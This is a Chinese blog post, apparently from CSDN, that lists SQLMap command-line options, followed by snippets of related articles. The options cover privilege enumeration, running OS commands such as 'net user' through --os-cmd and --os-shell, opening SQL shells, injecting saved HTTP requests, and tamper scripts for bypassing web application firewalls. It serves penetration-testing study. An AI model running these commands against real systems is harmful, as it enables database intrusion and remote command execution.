【信息安全服务】SQLMap 工具参数

最新推荐文章于 2024-07-11 18:55:16 发布
最新推荐文章于 2024-07-11 18:55:16 发布
阅读量395 收藏 2
点赞数 2
分类专栏: 信息安全服务笔记及分享 文章标签: sqlmap 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/keylion_/article/details/88626775
版权

1.测试注入点权限

sqlmap.py -u [URL] --privileges // 测试所有用户的权限
sqlmap.py -u [URL] -- privileges -U sa //测试sa用户权限

注:SQLmap命令区分大小写,-u和-U是两个参数

2.执行Shell命令

sqlmap.py -u  [URL] --os-cmd="net user" //执行net user 命令
sqlmap.py -u  [URL] --os-shell //系统交互的shell

3.获取当前数据库名称

sqlmap.py -u [URL]  --current-db

4.执行SQL命令

sqlmap.py -u [URL]  --sql-shell //返回SQL交互的shell,可以执行SQL语句
sqlmap.py -u [URL] --sql-query="sql"

5.POST提交方式

sqlmap.py -u [URL] --data "POST参数"

6.显示详细的等级

sqlmap.py -u [URL] --dbs -v 1
-v 参数包含以下7个等级:
·0:只显示Python的回溯、错误和关键信息;
·1:显示信息和警告信息;
·2:显示调试信息;
·3:有效载荷注入;
·4:显示HTTP请求;
·5:显示HTTP响应头;
·6:显示HTTP响应页面的内容。

7.注入HTTP请求

sqlmap.py -r head.txt --dbs //head.txt内容为HTTP请求

head.txt 内容如下:
 

POST /login.php HTTP/1.1
Host:www.secbug.org
User-Agent:Mozilla/5.0

username=admin&password=admin888

8.直接连接到数据库

sqlmap.py -d "mysql://admin:admin@192.168.1.8:3306/testab" --dbs

9.注入等级

sqlmap.py -u [URL] --level 3

10.将注入语句插入到指定位置

sqlmap.py -u "http:.//www.xxser.com/id/2*.html" --dbs

注:这一用法常用来伪静态注入。

11.使用SQLMap插件

sqlmap.py -u [URL] -tamper "space2morehash.py

注:常用来绕过WAF

Keyli0n
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
利用sqlmap进行POST注入
ChuMeng1999的博客
01-19 1万+
目录预备知识了解SqlmapPOST注入形成的原因实验目的实验环境实验步骤一使用sqlmap进行POST注入实验步骤二 预备知识 了解Sqlmap sqlmap是一款开源、功能强大的自动化SQL注入工具,支持Access,MySQL,Oracle,SQL Server,DB2等多种数据库。支持get,post,cookie注入,支持基于布尔的盲注,基于时间的盲注,错误回显注入,联合查询注入,堆查询注入等。 POST注入形成的原因 POST注入也属于SQL注入,所以究其原因还是由于参数没有过滤导致的。源码如下
sqlmap工具
11-26
SQLMap是一款强大的、自动化SQL注入工具,主要用于检测和利用网站应用程序中的SQL注入漏洞。它能够帮助安全研究人员或渗透测试人员快速、有效地发现和利用数据库层面的安全弱点,而无需深入掌握SQL语言的复杂性。 1...
信息安全】-安全工具-sqlmap
vector的博客
03-05 1016
sqlmap是一个自动化的sql注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞 1.安装 https://blog.csdn.net/u011781521/article/details/53909151 https://www.jianshu.com/p/3d3656be3c60 2.实验 在pikachu实验平台数字型注入中抓包,记录连接以及提交给服务器的参数 读取数据库 在cmd中进入sqlmap的安装目录,输入命令 D:\sqlmap\sqlmappro.
【SQL注入工具SQLMap参数详解
ssrf
09-02 2862
文章目录前言1、基本参数2、显示调试信息3、风险等级4、批量测试多个注入点5、获取http请求注入6、处理Google搜索结果7、以POST方式提交参数8、指定参数连接符9、cookie注入10、referer/headers/proxy11、时间控制12、绕过策略13、手动指定测试参数14、指定参数前后闭合字符15、指定使用哪种探测技术16、UNION查询指定参数17、二阶注入18、搜索指定库/表/列19、--udf-inject/--shared-lib20、日志文件读取与写入21、默认yes22、编码
sqlmap使用之-post注入、head注入(ua、cookie、referer)
最新发布
weixin_51520483的博客
07-11 433
bp抓包获取post数据将数据保存到post.txt文件加上-r指定数据文件。
sqlmap工具使用
huangyongkang666的博客
03-21 3644
sqlmap工具使用 1.sqlmap介绍 SQLMAP是开源的自动化SQL注入工具,由Python写成,具有如下特点: 1、完全支持MySQL、Oracle、PostgreSQL、MSSQL、Access、IBM DB2、SQLite、Firebird、Sybase、SAP MaxDB、HSQLDB和Informix等多种数据库管理系统。 2、完全支持布尔型盲注、时间型盲注、基于错误信息的注入、联合查询注入和堆查询注入。 3、在数据库证书、IP地址、端口和数据库名等条件允许的情况下支持不通过SQL注入点而
渗透测试:详解sqlmap进行POST注入、基于insert的注入(以vulnhub靶机LampSecurity:CTF7为例)
Bossfrank的博客
06-22 4718
本文以vulnhub靶机LampSecurity:CTF7为例,详解了insert(非select)类型的SQL注入方法,包含对报错注入函数updatexml的使用。同时还详解了使用sqlmap进行POST类型注入的方法。
Web应用安全:Sqlmap操作参数介绍.pptx
06-19
综上所述,Sqlmap是一个强大且全面的Web应用安全工具,适用于渗透测试和安全研究人员,它的多样性和灵活性使其成为检测和利用SQL注入漏洞的有效手段。通过熟练掌握和运用Sqlmap的各种参数,可以对Web应用的安全性...
sqlmap sql 注入测试工具
03-06
SQLMap是一款强大的、自动化SQL注入测试...总之,SQLMap是一个强大且全面的SQL注入测试工具,对于保障Web应用程序的安全性具有重要作用。熟练掌握其使用方法,结合日常的安全实践,可以有效地提高系统的安全防护能力。
sqlmap渗透工具
07-06
总之,SQLMap是一个强大的工具,对于安全专业人士来说,理解和掌握其使用方法至关重要,以便在合法的安全测试中有效地发现和修复SQL注入漏洞。请始终遵守法律法规,并在使用此类工具时保持谨慎。
利用sqlmap进行post注入学习笔记
weixin_52034407的博客
03-19 2962
使用sqlmap进行post注入学习笔记
sqlmap使用教程
weixin_57048716的博客
11-26 1779
常用步骤: 1.探测数据库名 --dbs --batch 2.探测表名 -D 库名 --tables --batch 3.探测字段名 -D 库名 -T 表名 --columns --batch 4.探测字段值 -D 库名 -T 表名 -C username(字段),password --dump --batch
sqlmap工具说明
tlucky的博客
03-06 1689
版本:v1.4.10支持环境:windows,linux等支持语言:python设计目的:可自动执行SQL注入缺陷的检测和开发过程,并接管数据库服务器实现:有强大的检测引擎,针对不同类型的数据库提供多样的渗透测试功能选项,实现数据库识别、数 据获取、访问DBMS\操作系统甚至通过带外数据连接的方式执行操作系统的命令。,以及从数据 库指纹识别、从数据库获取数据、访问底层文件的广泛范围的交换机通过带外连接在操作系统上 执行命令。
sql学习3(sqlmap的使用)
cyy001128的博客
04-03 683
接上一篇学习2。
常用的渗透测试工具(含安装教程&使用方法)
MachineGunJoe666
10-25 331
SQLMap是一个自动化的SQL注入工具,其主要功能是扫描、发现并利用给定URL的SQL注入漏洞,内置了很多绕过插件,支持的数据库是MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、IBM DB2、SQLite、Firebird、Sybase和SAP MaxDB。SQLMap采用了以下5种独特的SQL注入技术。● 基于布尔类型的盲注,即可以根据返回页面判断条件真假的注入。
SQL注入-产生位置+post注入+sqlmap
xiaoheizi的博客
06-28 370
—url没有参数并不代表没有注入,有时会在数据包中,http数据包中每个部分只要可以被接收,都可能产生漏洞。还有一种方式,不用保存数据包,可以直接扫描,就是使用。信息进行对比,涉及到数据库查询操作。信息整理保存,用户访问后数据库会获取用户的。网站根据用户的访问设备给予显示页面。会写到数据库,如果能自定义。测试显错位,结果直接爆出了。,然后将数据包中的两个。参数传递位置:可以在。测试出字段数后,输入。抓取登录数据包,右键。
SQLMap 使用参数详解
热门推荐
qq_37019068的博客
10-09 1万+
SQLMap 使用参数详解 SQLMap是一款自动化的SQL注入测试工具,在kali上已集成 如果不想使用kali的话,可以从github上直接拉取开源项目 git clone https://github.com/sqlmapproject/sqlmap.git 注:最新版的sqlmap应该是支持python3的,但是如果python3无法使用的话可以试试切换成python2执行 常见参数 -h 输出参数说明 -hh 输出详细的参数
sqlmap参数大全
卖瓜小农的博客
02-23 8557
sqlmap参数大全 cookie注入:sqlmap.py -u 注入点 --cookie “参数” --tables --level 2 POST登录框注入:sqlmap.py -r 从文件读取数据 -p 指定的参数 --tables sqlmap.py -u 登录的地址 --forms 自动判断注入 sqlmap.py -u 登录的地址 --data “指定参数” 绕过waf防火墙:sqlmap.py -u 注入点 -v 3 --dbs --batch --tamper space2morehash.
python网络安全列表_信息安全服务工具列表详解
weixin_39624733的博客
12-18 162
信息安全服务工具列表15TroubleshootingTroubleshooting-Sysdig是一个能够让系统管理员和开发人员以前所未有方式洞察其系统行为的监控工具。一款系统调试工具,能够对系统进行故障排查和监控,在系统故障的时候非常实用。Troubleshooting-SystemTap是监控和跟踪运行中的Linux内核的操作的动态方法。Troubleshooting-Perf是L...
SQL注入攻防:sqlmap工具详解
SQLmap是应对这一问题的专业工具,它能帮助安全研究人员或渗透测试人员发现并利用潜在的SQL注入漏洞。 在使用SQLmap时,了解其选项是非常重要的。例如,`-vVERBOSE` 选项用于设置详细级别,从0到6,数字越大,输出...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Keyli0n

赠人玫瑰 手有余香

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值